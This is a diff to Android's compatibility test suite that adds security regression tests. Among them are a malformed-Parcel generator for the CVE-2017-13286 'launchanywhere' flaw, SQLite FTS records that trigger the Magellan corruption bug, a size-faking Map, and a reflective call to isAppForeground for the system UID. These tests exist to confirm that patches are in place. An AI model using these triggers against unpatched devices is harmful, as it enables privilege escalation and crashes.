+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.launchanywhere;
+
+import com.android.security.cts.launchanywhere.IGenerateMalformedParcel;
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13286 implements IGenerateMalformedParcel {
+ @Override
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts." +
+ "IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString("launchanywhere");
+ data.writeInt(4);
+ data.writeString("android.hardware.camera2.params.OutputConfiguration");
+ data.writeInt(0);
+ data.writeInt(1);
+ data.writeInt(2);
+ data.writeInt(3);
+ data.writeInt(4);
+ data.writeInt(5);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(13);
+
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
diff --git a/tests/sensor/src/android/hardware/cts/SensorParameterRangeTest.java b/tests/sensor/src/android/hardware/cts/SensorParameterRangeTest.java
index 44135bc..c1c9fab 100644
--- a/tests/sensor/src/android/hardware/cts/SensorParameterRangeTest.java
+++ b/tests/sensor/src/android/hardware/cts/SensorParameterRangeTest.java
@@ -77,23 +77,23 @@
public void testAccelerometerRange() {
checkSensorRangeAndFrequency(
- mSensorManager.getDefaultSensor(Sensor.TYPE_ACCELEROMETER),
+ Sensor.TYPE_ACCELEROMETER,
ACCELEROMETER_MAX_RANGE,
ACCELEROMETER_MIN_FREQUENCY,
ACCELEROMETER_MAX_FREQUENCY);
- }
+ }
- public void testGyroscopeRange() {
+ public void testGyroscopeRange() {
checkSensorRangeAndFrequency(
- mSensorManager.getDefaultSensor(Sensor.TYPE_GYROSCOPE),
+ Sensor.TYPE_GYROSCOPE,
GYRO_MAX_RANGE,
GYRO_MIN_FREQUENCY,
GYRO_MAX_FREQUENCY);
- }
+ }
public void testMagnetometerRange() {
checkSensorRangeAndFrequency(
- mSensorManager.getDefaultSensor(Sensor.TYPE_MAGNETIC_FIELD),
+ Sensor.TYPE_MAGNETIC_FIELD,
MAGNETOMETER_MAX_RANGE,
MAGNETOMETER_MIN_FREQUENCY,
MAGNETOMETER_MAX_FREQUENCY);
@@ -102,7 +102,7 @@
public void testPressureRange() {
if (mHasHifiSensors) {
checkSensorRangeAndFrequency(
- mSensorManager.getDefaultSensor(Sensor.TYPE_PRESSURE),
+ Sensor.TYPE_PRESSURE,
PRESSURE_MAX_RANGE,
PRESSURE_MIN_FREQUENCY,
PRESSURE_MAX_FREQUENCY);
@@ -110,8 +110,14 @@
}
private void checkSensorRangeAndFrequency(
- Sensor sensor, double maxRange, double minFrequency, double maxFrequency) {
+ int sensorType, double maxRange, double minFrequency, double maxFrequency) {
if (!mHasHifiSensors && !mVrModeHighPerformance) return;
+
+ Sensor sensor = mSensorManager.getDefaultSensor(sensorType);
+ if (sensor == null) {
+ fail(String.format("Must support sensor type %d", sensorType));
+ }
+
assertTrue(String.format("%s Range actual=%.2f expected=%.2f %s",
sensor.getName(), sensor.getMaximumRange(), maxRange,
SensorCtsHelper.getUnitsForSensor(sensor)),
diff --git a/tests/sensor/src/android/hardware/cts/SensorSupportTest.java b/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
index 6fd0865..35d48df 100644
--- a/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
+++ b/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
@@ -22,6 +22,9 @@
import android.hardware.Sensor;
import android.hardware.SensorDirectChannel;
import android.hardware.SensorManager;
+import android.os.Build;
+
+import com.android.compatibility.common.util.PropertyUtil;
/**
* Checks if Hifi sensors or VR High performance mode sensors
@@ -61,7 +64,10 @@
}
public void testSupportsAccelerometerUncalibrated() {
- checkSupportsSensor(Sensor.TYPE_ACCELEROMETER_UNCALIBRATED);
+ // Uncalibrated accelerometer was not required before Android O
+ if (PropertyUtil.getFirstApiLevel() >= Build.VERSION_CODES.O) {
+ checkSupportsSensor(Sensor.TYPE_ACCELEROMETER_UNCALIBRATED);
+ }
}
public void testSupportsGyroscope() {
diff --git a/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java b/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java
new file mode 100644
index 0000000..c34a5f5
--- /dev/null
+++ b/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java
@@ -0,0 +1,152 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.database.sqlite.cts;
+
+
+import android.content.Context;
+import android.database.sqlite.SQLiteDatabase;
+import android.database.sqlite.SQLiteDatabaseCorruptException;
+import android.test.AndroidTestCase;
+
+/**
+ * This CTS test verifies Magellan SQLite Security Vulnerability.
+ * Without the fix, the last statement in each test case triggers a segmentation fault and the test
+ * fails.
+ * With the fix, the last statement in each test case triggers SQLiteDatabaseCorruptException with
+ * message "database disk image is malformed (code 267 SQLITE_CORRUPT_VTAB)", this is expected
+ * behavior that we are crashing and we are not leaking data.
+ */
+public class SQLiteSecurityTest extends AndroidTestCase {
+ private static final String DATABASE_NAME = "database_test.db";
+
+ private SQLiteDatabase mDatabase;
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+
+ getContext().deleteDatabase(DATABASE_NAME);
+ mDatabase = getContext().openOrCreateDatabase(DATABASE_NAME, Context.MODE_PRIVATE,
+ null);
+ assertNotNull(mDatabase);
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ mDatabase.close();
+ getContext().deleteDatabase(DATABASE_NAME);
+
+ super.tearDown();
+ }
+
+ public void testScript1() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts3;");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(1,'aback');");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(2,'abaft');");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(3,'abandon');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES(0,0,0,0,'0 29',X"
+ + "'0005616261636b03010200ffffffff070266740302020003046e646f6e03030200');");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("SELECT * FROM ft WHERE ft MATCH 'abandon';");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+
+ public void testScript2() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts3;");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(1,"
+ + "X'0004616263300301020003013103020200040130030b0200040131030c0200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(2,"
+ + "X'00056162633132030d0200040133030e0200040134030f020004013503100200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(3,"
+ + "X'0005616263313603110200040137031202000401380313020004013903140200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(4,"
+ + "X'00046162633203030200030133030402000301340305020003013503060200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(5,"
+ + "X'000461626336030702000301370308020003013803090200030139030a0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir "
+ + "VALUES(0,0,1,5,'5 157',X'0101056162633132ffffffff070236030132030136');");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("SELECT * FROM ft WHERE ft MATCH 'abc20';");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+
+ public void testScript3() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts4;");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES"
+ + "(1,X'00046162633003010200040178030202000501780303020003013103040200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES"
+ + "(2,X'00056162633130031f0200ffffffff07ff5566740302020003046e646f6e03030200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(384,NULL);");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,0,0,0,'0 24',X'000561626331780305020005017803060200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + " (0,1,0,0,'0 24',X'000461626332030702000401780308020005017803090200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,2,0,0,'0 24',X'000461626333030a0200040178030b0200050178030c0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES" +
+ "(0,3,0,0,'0 24',X'000461626334030d0200040178030e0200050178030f0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,4,0,0,'0 24',X'000461626335031002000401780311020005017803120200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,5,0,0,'0 24',X'000461626336031302000401780314020005017803150200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,6,0,0,'0 24',X'000461626337031602000401780317020005017803180200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,7,0,0,'0 24',X'00046162633803190200040178031a0200050178031b0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,8,0,0,'0 24',X'000461626339031c0200040178031d0200050178031e0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,9,0,0,'0 25',X'00066162633130780320020006017803210200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,10,0,0,'0 25',X'00056162633131032202000501780323020006017803240200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES(1,0,1,2,'384 -42',X'0101056162633130');");
+ mDatabase.execSQL("INSERT INTO ft_stat VALUES(1,X'000b');");
+ mDatabase.execSQL("PRAGMA writable_schema=OFF;");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("INSERT INTO ft(ft) VALUES('merge=1,4');");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+}
+
+
+
+
+
+
+
+
+
+
+
diff --git a/tests/tests/os/src/android/os/cts/ParcelTest.java b/tests/tests/os/src/android/os/cts/ParcelTest.java
index 7645477..3715850 100644
--- a/tests/tests/os/src/android/os/cts/ParcelTest.java
+++ b/tests/tests/os/src/android/os/cts/ParcelTest.java
@@ -19,7 +19,11 @@
import java.io.FileDescriptor;
import java.io.Serializable;
import java.util.ArrayList;
+import java.util.Collection;
import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.Set;
import android.content.pm.Signature;
import android.os.BadParcelableException;
@@ -3250,4 +3254,58 @@
} catch (RuntimeException expected) {
}
}
+
+ public void testMaliciousMapWrite() {
+ class MaliciousMap<K, V> extends HashMap<K, V> {
+ public int fakeSize = 0;
+ public boolean armed = false;
+
+ class FakeEntrySet extends HashSet<Entry<K, V>> {
+ public FakeEntrySet(Collection<? extends Entry<K, V>> c) {
+ super(c);
+ }
+
+ @Override
+ public int size() {
+ if (armed) {
+ // Only return fake size on next call, to mitigate unexpected behavior.
+ armed = false;
+ return fakeSize;
+ } else {
+ return super.size();
+ }
+ }
+ }
+
+ @Override
+ public Set<Map.Entry<K, V>> entrySet() {
+ return new FakeEntrySet(super.entrySet());
+ }
+ }
+
+ Parcel parcel = Parcel.obtain();
+
+ // Fake having more Map entries than there really are
+ MaliciousMap map = new MaliciousMap<String, String>();
+ map.fakeSize = 1;
+ map.armed = true;
+ try {
+ parcel.writeMap(map);
+ fail("Should have thrown a BadParcelableException");
+ } catch (BadParcelableException bpe) {
+ // good
+ }
+
+ // Fake having fewer Map entries than there really are
+ map = new MaliciousMap<String, String>();
+ map.put("key", "value");
+ map.fakeSize = 0;
+ map.armed = true;
+ try {
+ parcel.writeMap(map);
+ fail("Should have thrown a BadParcelableException");
+ } catch (BadParcelableException bpe) {
+ // good
+ }
+ }
}
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 4da499e..51d48e7 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -50,6 +50,10 @@
<category android:name="android.intent.category.FRAMEWORK_INSTRUMENTATION_TEST"/>
</intent-filter>
</activity>
+
+ <activity android:name="android.security.cts.ActivityManagerTest$NormalActivity" />
+ <activity android:name="android.security.cts.ActivityManagerTest$MaliciousActivity" />
+ <service android:name="android.security.cts.ActivityManagerTest$AppMonitoringService" />
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/security/res/raw/bug_36592202.ogg b/tests/tests/security/res/raw/bug_36592202.ogg
old mode 100755
new mode 100644
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_64710074.mp4 b/tests/tests/security/res/raw/bug_64710074.mp4
new file mode 100644
index 0000000..5544ffe
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_64710074.mp4
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
index ae75ec9..7e57319 100644
--- a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
+++ b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
@@ -15,16 +15,47 @@
*/
package android.security.cts;
+import android.annotation.Nullable;
+import android.app.Activity;
+import android.app.ActivityManager;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.Handler;
import android.os.IBinder;
+import android.os.Process;
import android.platform.test.annotations.SecurityTest;
+import android.support.test.InstrumentationRegistry;
+import android.util.Log;
+import android.view.WindowManager;
+
import junit.framework.TestCase;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.util.concurrent.CountDownLatch;
+import java.util.concurrent.TimeUnit;
+
@SecurityTest
public class ActivityManagerTest extends TestCase {
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static CountDownLatch sLatch;
+ private static volatile int sNormalActivityUserId;
+ private static volatile boolean sCannotReflect;
+ private static volatile boolean sIsAppForeground;
+
+ private static final String TAG = "ActivityManagerTest";
+
@Override
protected void setUp() throws Exception {
super.setUp();
+
+ sLatch = new CountDownLatch(2);
+ sNormalActivityUserId = -1;
+ sCannotReflect = false;
+ sIsAppForeground = false;
}
@SecurityTest(minPatchLevel = "2015-03")
@@ -43,4 +74,117 @@
// Patched devices should throw this exception
}
}
+
+ public void testIsAppInForegroundNormal() throws Exception {
+ /* Verify that isAppForeground can be called by the caller on itself. */
+ launchActivity(NormalActivity.class);
+ sNormalActivityUserId = InstrumentationRegistry.getTargetContext().getPackageManager()
+ .getPackageUid(SECURITY_CTS_PACKAGE_NAME, 0);
+ sLatch.await(5, TimeUnit.SECONDS); // Ensure the service has ran at least twice.
+ if (sCannotReflect) return; // If reflection is not possible, pass the test.
+ assertTrue("isAppForeground failed to query for uid on itself.", sIsAppForeground);
+ }
+
+ public void testIsAppInForegroundMalicious() throws Exception {
+ /* Verify that isAppForeground cannot be called by another app on a known uid. */
+ launchActivity(MaliciousActivity.class);
+ launchSettingsActivity();
+ sLatch.await(5, TimeUnit.SECONDS); // Ensure the service has ran at least twice.
+ if (sCannotReflect) return; // If reflection is not possible, pass the test.
+ assertFalse("isAppForeground successfully queried for a uid other than itself.",
+ sIsAppForeground);
+ }
+
+ private void launchActivity(Class<? extends Activity> clazz) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ private void launchSettingsActivity() {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(android.provider.Settings.ACTION_SETTINGS);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ public static class NormalActivity extends Activity {
+
+ @Override
+ protected void onCreate(@Nullable Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);
+
+ Intent intent = new Intent(this, AppMonitoringService.class);
+ intent.putExtra(AppMonitoringService.EXTRA_UID, sNormalActivityUserId);
+ startService(intent);
+ }
+ }
+
+ public static class MaliciousActivity extends Activity {
+
+ @Override
+ protected void onCreate(@Nullable Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);
+
+ Intent intent = new Intent(this, AppMonitoringService.class);
+ intent.putExtra(AppMonitoringService.EXTRA_UID, Process.SYSTEM_UID);
+ startService(intent);
+ finish();
+ }
+ }
+
+ public static class AppMonitoringService extends Service {
+
+ private static final String EXTRA_UID = "android.security.cts.extra.UID";
+ private int uid;
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ uid = intent.getIntExtra(EXTRA_UID, -1);
+ return super.onStartCommand(intent, flags, startId);
+ }
+
+ public AppMonitoringService() {
+ super.onCreate();
+
+ final Handler handler = new Handler();
+ handler.postDelayed(new Runnable() {
+ public void run() {
+ try {
+ ActivityManager activityManager = (ActivityManager) getSystemService(
+ ACTIVITY_SERVICE);
+ Field field = activityManager.getClass().getDeclaredField(
+ "IActivityManagerSingleton");
+ field.setAccessible(true);
+ Object fieldValue = field.get(activityManager);
+ Method method = fieldValue.getClass().getDeclaredMethod("create");
+ method.setAccessible(true);
+ Object IActivityInstance = method.invoke(fieldValue);
+ Method isAppForeground = IActivityInstance.getClass().getDeclaredMethod(
+ "isAppForeground", int.class);
+ isAppForeground.setAccessible(true);
+ boolean res = (boolean) isAppForeground.invoke(IActivityInstance, uid);
+ if (res) {
+ sIsAppForeground = true;
+ }
+ } catch (Exception e) {
+ Log.e(TAG, "Failed to fetch/invoke field/method via reflection.", e);
+ sCannotReflect = true;
+ }
+ sLatch.countDown();
+ handler.postDelayed(this, 200);
+
+ }
+ }, 0);
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ throw new UnsupportedOperationException("Not yet implemented");
+ }
+ }
}
\ No newline at end of file
diff --git a/tests/tests/text/src/android/text/util/cts/LinkifyTest.java b/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
index c0ad4b6..eee20a2 100644
--- a/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
+++ b/tests/tests/text/src/android/text/util/cts/LinkifyTest.java
@@ -935,6 +935,17 @@
domain.length(), email);
}
+ @Test
+ public void testAddLinks_unsupportedCharacters() {
+ String url = "moc.diordna.com";
+ verifyAddLinksWithWebUrlSucceeds(url + " should be linkified", url);
+
+ verifyAddLinksWithWebUrlFails("u202C character should not be linkified", "\u202C" + url);
+ verifyAddLinksWithWebUrlFails("u202D character should not be linkified", url + "\u202D");
+ verifyAddLinksWithWebUrlFails(
+ "u202E character should not be linkified", url + "moc\u202E.diordna.com");
+ }
+
// Utility functions
private static void verifyAddLinksWithWebUrlSucceeds(String msg, String url) {
verifyAddLinksSucceeds(msg, url, Linkify.WEB_URLS);